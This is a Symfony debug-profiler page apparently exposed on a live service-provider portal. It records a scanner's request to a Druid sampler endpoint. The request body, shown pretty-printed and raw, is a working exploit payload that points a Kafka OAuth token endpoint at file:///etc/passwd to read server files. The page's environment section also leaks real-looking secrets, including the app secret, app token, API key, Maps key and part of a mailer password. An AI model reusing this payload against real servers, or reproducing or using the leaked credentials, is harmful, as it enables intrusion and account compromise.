https://prestadores.vivofacil.org/druid/indexer/v1/sampler?for=connect

ErrorController

Request

GET Parameters

Key Value
for
"connect"

POST Parameters

No POST parameters

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_controller
"error_controller"
_stopwatch_token
"404d74"
exception
Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#252
  -statusCode: 404
  -headers: []
  #message: "No route found for "POST https://prestadores.vivofacil.org/druid/indexer/v1/sampler""
  #code: 0
  #file: "/var/www/prestadores.vivofacil.org/vendor/symfony/http-kernel/EventListener/RouterListener.php"
  #line: 135
  -previous: Symfony\Component\Routing\Exception\ResourceNotFoundException {#201 …}
  trace: {
    /var/www/prestadores.vivofacil.org/vendor/symfony/http-kernel/EventListener/RouterListener.php:135 {
      Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(RequestEvent $event) …
      › 
      ›     throw new NotFoundHttpException($message, $e);} catch (MethodNotAllowedException $e) {
    }
    /var/www/prestadores.vivofacil.org/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:117 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › 
      › ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);}
    /var/www/prestadores.vivofacil.org/vendor/symfony/event-dispatcher/EventDispatcher.php:230 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
    }
    /var/www/prestadores.vivofacil.org/vendor/symfony/event-dispatcher/EventDispatcher.php:59 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
    }
    /var/www/prestadores.vivofacil.org/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:154 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
    }
    /var/www/prestadores.vivofacil.org/vendor/symfony/http-kernel/HttpKernel.php:128 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);}
    /var/www/prestadores.vivofacil.org/vendor/symfony/http-kernel/HttpKernel.php:74 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->handleRaw($request, $type);} catch (\Exception $e) {
    }
    /var/www/prestadores.vivofacil.org/vendor/symfony/http-kernel/Kernel.php:202 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
    }
    /var/www/prestadores.vivofacil.org/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35 {
      Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run(): int …
      › {    $response = $this->kernel->handle($this->request);    $response->send();
    }
    /var/www/prestadores.vivofacil.org/vendor/autoload_runtime.php:35 {
      require_once …
      ›         ->getRunner($app)        ->run());
    }
    /var/www/prestadores.vivofacil.org/public/index.php:5 {
      › 
      › require_once dirname(__DIR__).'/vendor/autoload_runtime.php';arguments: {
        "/var/www/prestadores.vivofacil.org/vendor/autoload_runtime.php"
      }
    }
  }
}
logger
Symfony\Bridge\Monolog\Logger {#94 …8}

Request Headers

Header Value
accept-encoding
"gzip"
connection
"close"
content-length
"1240"
content-type
"application/json"
host
"prestadores.vivofacil.org"
user-agent
"Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.20"
x-php-ob-level
"1"

Request Content

Pretty

{
    "type": "kafka",
    "spec": {
        "type": "kafka",
        "ioConfig": {
            "type": "kafka",
            "consumerProperties": {
                "bootstrap.servers": "127.0.0.1:6666",
                "sasl.mechanism": "OAUTHBEARER",
                "security.protocol": "SASL_SSL",
                "sasl.login.callback.handler.class": "org.apache.kafka.common.security.oauthbearer.secured.OAuthBearerLoginCallbackHandler",
                "sasl.oauthbearer.token.endpoint.url": "file:\/\/\/etc\/passwd",
                "sasl.jaas.config": "org.apache.kafka.common.security.oauthbearer.OAuthBearerLoginModule required sasl.oauthbearer.token.endpoint.url=\"http:\/\/127.0.0.1:9999\/token\" sasl.oauthbearer.jwks.endpoint.url=\"http:\/\/127.0.0.1:9999\/jwks\" sasl.oauthbearer.client.id=your-client-id sasl.oauthbearer.client.secret=your-client-secret sasl.oauthbearer.expected.audience=kafka sasl.oauthbearer.expected.issuer=\"http:\/\/127.0.0.1:9999\" useFirstPass=true serviceName=kafka debug=true;"
            },
            "topic": "test",
            "useEarliestOffset": true,
            "inputFormat": {
                "type": "regex",
                "pattern": "([\\s\\S]*)",
                "listDelimiter": "",
                "columns": [
                    "raw"
                ]
            }
        },
        "dataSchema": {
            "dataSource": "sample",
            "timestampSpec": {
                "column": "!!!_no_such_column_!!!",
                "missingValue": "1970-01-01T00:00:00Z"
            },
            "dimensionsSpec": {},
            "granularitySpec": {
                "rollup": false
            }
        },
        "tuningConfig": {
            "type": "kafka"
        }
    },
    "samplerConfig": {
        "numRows": 500,
        "timeoutMs": 15000
    }
}

Raw

{"type":"kafka","spec":{"type":"kafka","ioConfig":{"type":"kafka","consumerProperties":{"bootstrap.servers":"127.0.0.1:6666","sasl.mechanism":"OAUTHBEARER","security.protocol":"SASL_SSL","sasl.login.callback.handler.class":"org.apache.kafka.common.security.oauthbearer.secured.OAuthBearerLoginCallbackHandler","sasl.oauthbearer.token.endpoint.url":"file:///etc/passwd","sasl.jaas.config":"org.apache.kafka.common.security.oauthbearer.OAuthBearerLoginModule required sasl.oauthbearer.token.endpoint.url=\"http://127.0.0.1:9999/token\" sasl.oauthbearer.jwks.endpoint.url=\"http://127.0.0.1:9999/jwks\" sasl.oauthbearer.client.id=your-client-id sasl.oauthbearer.client.secret=your-client-secret sasl.oauthbearer.expected.audience=kafka sasl.oauthbearer.expected.issuer=\"http://127.0.0.1:9999\" useFirstPass=true serviceName=kafka debug=true;"},"topic":"test","useEarliestOffset":true,"inputFormat":{"type":"regex","pattern":"([\\s\\S]*)","listDelimiter":"","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{},"granularitySpec":{"rollup":false}},"tuningConfig":{"type":"kafka"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-type
"text/html; charset=UTF-8"
date
"Mon, 15 Jun 2026 12:08:32 GMT"
x-debug-exception
"No%20route%20found%20for%20%22POST%20https%3A%2F%2Fprestadores.vivofacil.org%2Fdruid%2Findexer%2Fv1%2Fsampler%22"
x-debug-exception-file
"%2Fvar%2Fwww%2Fprestadores.vivofacil.org%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135"
x-debug-token
"94da90"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
API_KEY
"e5fc8596-qqez-5155-zo4f-41dd3f155188"
API_URL_SERVICE_PORTAL
"https://gestion.vivofacil.org/api"
API_VERSION_SERVICE_PORTAL
"v1"
APP_ENV
"dev"
APP_NAME
"Portal de Prestadores de Alares"
APP_SECRET
"7vsvDWxN3r3WvTjTVnrSuqAcTNtY5DRB"
APP_TOKEN
"lJMu58njeyIfYrivEpvHk0wcwG4Cp6KTjtWp38QapysBuae7yadBEuQNLPOw0uw6b00OepPIuzCK1w27e4lJIyUKVYJ3ENOxKGWM85lkmv209wuIIJTkZ7VsvftSeYy7"
AUTHENTICATION_KEY
"EDIT"
AUTHENTICATION_TOKEN
"EDIT"
DATABASE_URL
"mysql://db_user:db_password@127.0.0.1:3306/db_name?serverVersion=5.7&charset=utf8mb4"
DEV_EMAILS
"desarrollo@alares.es"
GOOGLE_MAPS_PUBLIC_KEY
"AIzaSyAnoowlhGOt23DWy0YI7j5R7tbBCrCqYs0"
MAILER_DSN
"gmail+smtp://no-reply@vivofacil.com:Vivo_facil_2022_****@default"
MAILER_FROM_EMAIL
"portal-prestadores@vivofacil.com"
MESSENGER_TRANSPORT_DSN
"doctrine://default?auto_setup=0"
VERIFY_PEER_AND_HOST
"true"

Defined as regular env variables

Key Value
APP_DEBUG
"1"
CONTENT_LENGTH
"1240"
CONTENT_TYPE
"application/json"
CONTEXT_DOCUMENT_ROOT
"/var/www/prestadores.vivofacil.org/public"
CONTEXT_PREFIX
""
DOCUMENT_ROOT
"/var/www/prestadores.vivofacil.org/public"
GATEWAY_INTERFACE
"CGI/1.1"
HTTPS
"on"
HTTP_ACCEPT_ENCODING
"gzip"
HTTP_CONNECTION
"close"
HTTP_HOST
"prestadores.vivofacil.org"
HTTP_USER_AGENT
"Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.20"
PATH
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
PHP_SELF
"/index.php"
QUERY_STRING
"for=connect"
REDIRECT_HTTPS
"on"
REDIRECT_QUERY_STRING
"for=connect"
REDIRECT_SSL_TLS_SNI
"prestadores.vivofacil.org"
REDIRECT_STATUS
"200"
REDIRECT_URL
"/druid/indexer/v1/sampler"
REDIRECT_no-gzip
"1"
REMOTE_ADDR
"54.154.130.35"
REMOTE_PORT
"55108"
REQUEST_METHOD
"GET"
REQUEST_SCHEME
"https"
REQUEST_TIME
1781525312
REQUEST_TIME_FLOAT
1781525312.0612
REQUEST_URI
"/druid/indexer/v1/sampler?for=connect"
SCRIPT_FILENAME
"/var/www/prestadores.vivofacil.org/public/index.php"
SCRIPT_NAME
"/index.php"
SERVER_ADDR
"10.0.0.7"
SERVER_ADMIN
"webmaster@localhost"
SERVER_NAME
"prestadores.vivofacil.org"
SERVER_PORT
"443"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SIGNATURE
"<address>Apache/2.4.63 (Ubuntu) Server at prestadores.vivofacil.org Port 443</address>\n"
SERVER_SOFTWARE
"Apache/2.4.63 (Ubuntu)"
SSL_TLS_SNI
"prestadores.vivofacil.org"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_SECRET,MESSENGER_TRANSPORT_DSN,DATABASE_URL,APP_NAME,AUTHENTICATION_KEY,AUTHENTICATION_TOKEN,API_URL_SERVICE_PORTAL,API_VERSION_SERVICE_PORTAL,VERIFY_PEER_AND_HOST,GOOGLE_MAPS_PUBLIC_KEY,API_KEY,APP_TOKEN,MAILER_DSN,MAILER_FROM_EMAIL,DEV_EMAILS"
no-gzip
"1"

Parent Request

Return to parent request (token = 6122d4)

Key Value
_remove_csp_headers
true
_stopwatch_token
"d43f67"